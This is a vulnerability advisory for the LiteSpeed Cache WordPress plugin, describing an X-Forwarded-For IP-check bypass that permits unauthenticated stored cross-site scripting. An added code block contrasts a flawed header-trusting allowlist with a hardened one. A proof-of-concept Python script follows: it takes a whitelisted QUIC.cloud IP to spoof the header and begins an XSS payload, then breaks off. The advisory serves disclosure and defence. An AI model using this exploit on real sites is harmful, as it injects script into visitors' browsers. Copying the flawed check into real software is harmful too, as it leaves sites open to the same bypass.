wpvulndb | Emil Kylander | WPVDB-ID: E9966B3E-2EB9-4D70-8C18-6A829B4827CC
History: Nov 30, 2021 - 12:00 a.m.

LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS

wpscan.com

EPSS

0.002

Percentile

55.2%

The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoints could be used to set CSS code if a setting is enabled, and that CSS is then output in some pages without being sanitised and escaped. Combining those two issues, an unauthenticated attacker could put Cross-Site Scripting payloads in pages visited by users.
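The first issue, modelled as an added example written for this page (it is not LiteSpeed Cache code and does not reproduce the plugin's actual check): an allowlist check that takes the source IP from X-Forwarded-For, beside one that honours the header only when the TCP peer is a proxy the operator controls. The allowlist entries, the proxy range and all function names are assumptions.

```python
import ipaddress

# Constructed allowlist standing in for the published QUIC.cloud IP list
# (documentation-range addresses, not real QUIC.cloud IPs).
ALLOWLIST = [ipaddress.ip_network(n) for n in ("203.0.113.10/32", "198.51.100.0/28")]
# Assumption: reverse proxies run by the site operator; leave empty when there are none.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _in(ip, nets):
    """True if ip parses as an address and falls inside one of nets."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        return False
    return any(addr in net for net in nets)


def naive_is_allowed(remote_addr, headers):
    """Flawed pattern: a client-supplied header decides the source IP."""
    xff = headers.get("X-Forwarded-For")
    ip = xff.split(",")[0] if xff else remote_addr
    return _in(ip, ALLOWLIST)


def client_ip(remote_addr, headers):
    """Resolve the source IP without trusting headers from arbitrary peers."""
    if not _in(remote_addr, TRUSTED_PROXIES):
        return remote_addr  # direct connection: the header is attacker-controlled
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    # Each trusted proxy appends the peer it saw, so walk right to left and
    # stop at the first hop that is not one of our own proxies.
    for hop in reversed(hops):
        if not _in(hop, TRUSTED_PROXIES):
            return hop
    return remote_addr


def hardened_is_allowed(remote_addr, headers):
    """Allowlist check against the resolved, not the claimed, source IP."""
    return _in(client_ip(remote_addr, headers), ALLOWLIST)
```
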

PoC

The "Load CSS Asynchronously" setting in the Page Optimization (/wp-admin/admin.php?page=litespeed-page_optm) needs to be turned on for this to work.

    #!/bin/python3
    import requests
    import json

    def get_whitelist_ips():
        return requests.get("https://quic.cloud/ips", verify=False).text

    print("[+] Getting the whitelisted ips…")
    whitelist_ip = get_whitelist_ips().split("\n")[0]
    print(f"[+] Using {whitelist_ip}")
    payload = "alert(/XSS-cache/);
